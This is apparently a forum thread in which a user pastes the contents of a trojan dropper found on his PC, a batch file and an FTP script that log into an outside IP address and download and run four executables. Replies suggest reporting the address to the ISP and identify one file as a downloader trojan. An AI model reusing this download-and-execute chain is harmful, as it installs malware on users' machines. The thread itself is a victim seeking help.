Found IP address sending viruses to my PC.. What to do?

[JoBlink]

Two files (be careful not to run it, you'll get a Torjan, and it's not a condom!):

FILE "o.bat"
\\\\\\\\\\\\\\\\\\\\\\
if not exist H:\WINNTstatuslog ftp -s
if exist newdevin.exe newdevin.exe
if exist 449166.exe 449166.exe
if exist TVM_B5.EXE TVM_B5.EXE
if exist 06wu29rd.exe 06wu29rd.exe
\\\\\\\\\\\\\\\\\\\\\\\\


FILE "O" - no extention
//////////////////////
open 207.58.159.14
tmpacct
12345
bin
get newdevin.exe
get 449166.exe
get TVM_B5.EXE
get 06wu29rd.exe
bye
\\\\\\\\\\\\\\\\\\\\\\\

IF YOU RUN "o.bat", you'll get viruses listed in "o"

There you have it: IP address, password and file names..
WHat can I do with these guys?

THanks!

 

[manarth]

Ignore it. I get far too many attacks - on my work network, on my home network, on my servers - to chase each one.

It's probably just a compromised PC, whose innocent owner doesn't realise his/her machine is spewing out this garbage.

If you're really bothered, use the IP to identify the ISP involved, and contact the abuse@_isp_ address.

<marc> i wonder what will happen if i press this...[ul][li]please tell us if our suggestion has helped[/li][li]need some help? faq581-3339[/li][/ul]

 

[ximbro]

http://securityresponse.symantec.com/avcenter/venc/data/adware.binet.html

The file C:\WINDOWS\system32\06wu29rd.exe is a Adware threat according to Norton, but it doesn't list the accompanying files or possible dll's on my machine. Doing a dependency check on these .exe's showed nothing unusual. Basically a downloading trojan. I have the same ip address listed, but it returns no.such.address. Could be a variant of binet, etc.